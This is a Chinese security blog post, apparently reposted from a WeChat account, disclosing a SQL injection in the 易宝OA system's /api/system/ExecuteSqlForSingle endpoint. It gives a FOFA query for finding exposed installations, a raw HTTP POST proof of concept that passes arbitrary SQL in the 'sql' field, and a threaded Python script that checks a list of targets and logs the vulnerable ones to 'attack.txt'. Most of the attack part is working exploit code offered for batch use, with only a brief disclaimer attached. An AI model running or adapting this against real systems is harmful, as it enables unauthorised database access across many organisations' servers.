关注本公众号 ,长期推送漏洞文章
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
漏洞简介
易宝OA存在SQL注入漏洞,
fofa:product="顶讯科技-易宝OA系统"
资产:
![【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]](http://cn-sec.com/wp-content/uploads/2023/11/4-1701069888.png "【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]")
漏洞复现
使用Burp或Yakit进行抓包改包
![【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]](http://cn-sec.com/wp-content/uploads/2023/11/5-1701069889.png "【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]")
POC
POST /api/system/ExecuteSqlForSingle HTTP/1.1Host: IP:PORTContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters
批量测试
![【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]](http://cn-sec.com/wp-content/uploads/2023/11/5-1701069891.png "【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]")
import requestsimport concurrent.futuresdef check_vulnerability(target):headers = {"User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)","Content-Type": "application/x-www-form-urlencoded"}data = {"token": "zxh","sql": "select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)","strParameters": ""}try:res = requests.post(f"{target}/api/system/ExecuteSqlForSingle", headers=headers,data=data,timeout=5)if "e10adc3949ba59abbe56e057f20f883e" in res.text and "success" in res.text:print(f"{target} 漏洞存在")with open("attack.txt", 'a') as f:f.write(f"{target}n")else:print(f"{target} 漏洞不存在")except:print(f"{target} 访问错误")if __name__ == "__main__":f = open("target.txt", 'r')targets = f.read().splitlines()# 使用线程池并发执行检查漏洞with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:executor.map(check_vulnerability, targets)
脚本获取方式:关注本公众号,后台回复“1105”
后台回复“交流群”获取技术交流群链接
原文始发于微信公众号(知攻善防实验室):【最新漏洞】易宝OA ExecuteSqlForSingle SQL注入漏洞[附批量脚本]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论